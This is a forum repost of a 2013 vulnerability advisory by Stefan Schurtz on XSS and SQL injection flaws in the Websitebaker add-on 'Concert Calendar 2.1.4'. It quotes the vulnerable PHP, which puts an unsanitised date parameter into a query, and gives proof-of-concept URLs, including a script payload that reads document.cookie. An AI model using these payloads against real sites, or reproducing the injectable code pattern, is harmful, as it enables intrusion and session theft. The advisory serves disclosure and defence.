DarkLegion Posted January 9, 2013 Report Posted January 9, 2013 Advisory: Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerabilityAdvisory ID: SSCHADV2013-001Author: Stefan SchurtzAffected Software: Successfully tested on Concert Calendar 2.1.4Vendor URL: http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37Vendor Status: informed==========================Vulnerability Description==========================Websitebaker Add-on 'Concert Calendar 2.1.4' is prone to a XSS and SQLi vulnerability==========================Vuln code==========================// view.phpif (isset($_GET['date'])) { $date = $_GET['date'];}...// SQLi$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // Zeile 184// XSSecho " ".switch_date($date, $dateview)." "; // Zeile 176==========================PoC-Exploit==========================// SQLi (magic_quotes = off)http://[target]/wb/pages/addon.php?date=[SQLi]// XSShttp://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script>==========================Solution==========================-==========================Disclosure Timeline==========================01-Jan-2013 - developer informed==========================Credits==========================Vulnerabilities found and advisory written by Stefan Schurtz.==========================References==========================http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt Quote